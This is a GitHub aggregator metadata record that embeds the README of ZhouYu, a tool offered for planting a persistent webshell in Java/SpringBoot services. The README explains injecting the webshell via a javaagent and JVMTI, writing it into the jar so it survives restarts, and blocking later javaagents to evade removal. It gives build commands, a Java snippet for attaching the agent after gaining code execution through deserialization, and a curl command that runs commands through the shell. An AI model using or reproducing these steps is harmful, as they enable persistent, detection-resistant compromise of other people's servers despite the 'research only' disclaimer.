{"id":13843346,"url":"https://github.com/threedr3am/ZhouYu","last_synced_at":"2025-07-11T18:31:44.921Z","repository":{"id":45011178,"uuid":"352593180","full_name":"threedr3am/ZhouYu","owner":"threedr3am","description":"(Zhou Yu) Java - SpringBoot persistent WebShell learning demo (not only SpringBoot; works with any service that conforms to the JavaEE specification)","archived":false,"fork":false,"pushed_at":"2021-12-29T06:12:34.000Z","size":41,"stargazers_count":579,"open_issues_count":2,"forks_count":64,"subscribers_count":11,"default_branch":"main","last_synced_at":"2024-08-05T17:37:06.500Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/threedr3am.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-03-29T09:50:33.000Z","updated_at":"2024-08-01T08:55:50.000Z","dependencies_parsed_at":"2022-08-12T11:40:45.691Z","dependency_job_id":null,"html_url":"https://github.com/threedr3am/ZhouYu","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/threedr3am%2FZhouYu","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/threedr3am%2FZhouYu/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/threedr3am%2FZhouYu/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/threedr3am%2FZhouYu/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/threedr3am","download_url":"https://codeload.github.com/threedr3am/ZhouYu/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github
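","repositories_count":225745588,"owners_count":17517674,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:02:00.167Z","updated_at":"2024-11-21T14:31:05.386Z","avatar_url":"https://github.com/threedr3am.png","language":"Java","funding_links":[],"categories":["Java"],"sub_categories":[],"readme":"*This tool is for security research only. Using it to launch illegal attacks is prohibited; the user is responsible for any consequences.*\n\n### ZhouYu -\u003e 周瑜\n\nJava - SpringBoot persistent WebShell (works with any service that conforms to the JavaEE specification)\n\nBackground: in the post-Spring era, with SpringBoot's jar deployment model, there is generally no JSP anymore and all templates live inside the jar. While everyone is keen on in-memory webshells, it turns out they are easily detected and removed (the detection methods found online all come down to a javaagent that uses JVMTI to reload classes), and they are lost after a restart!\n\n1. ZhouYu brings a new way of writing a webshell: through a javaagent, using the JVMTI mechanism, it rewrites a class during the callback to insert the webshell, and it prevents the webshell from being detected and removed by blocking any javaagent from loading afterwards\n\n2. After the webshell is inserted into the modified class, the class is persisted into the jar, replacing the original class, which makes the webshell persistent: no matter how often you restart, you cannot shake it off\n\n### 1. Build and package\n\nCommand:\n```text\ngradle :agent:shadowJar\n```\nor\n```text\n./gradlew :agent:shadowJar\n```\n\nThe build produces agent/build/libs/agent-1.0-SNAPSHOT-all.jar, which is ZhouYu.jar\n\n### 2. Usage\n\nTwo scenarios:\n\n1. When you know the JVM PID and can write a temporary file (ZhouYu.jar). This scenario is generally not very common and occurs mostly in testing\n```text\njava -jar ZhouYu.jar 23232, where 23232 is the PID of the JVM process to attach to!\n```\n\n2. When you can execute a small piece of code (an in-memory shell generally works by loading a piece of malicious bytecode during deserialization)\n\nFirst write the compiled ZhouYu.jar to a temporary directory, e.g. /tmp/ZhouYu.jar\n\nThen execute the following code:\n```\ntry {\n  String pid = java.lang.management.ManagementFactory.getRuntimeMXBean().getName();\n  int indexOf = pid.indexOf('@');\n  if (indexOf \u003e 0) {\n    pid = pid.substring(0, indexOf);\n    Runtime.getRuntime().exec(String.format(\"java -jar /tmp/ZhouYu.jar %s\", pid));\n  }\n} catch (Throwable throwable) {\n\n}\n```\n\n3. Execute a command\n```\ncurl -XGET \"http://127.0.0.1:8080?cmd=whoami\"\n```\n\n### WARNING\n\n#### To prevent production incidents, the original jar (A.jar) is backed up before it is replaced and modified; the backup is written to the current directory (named .A.jar.bk)","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fthreedr3am%2FZhouYu","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fthreedr3am%2FZhouYu","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fthreedr3am%2FZhouYu/lists"}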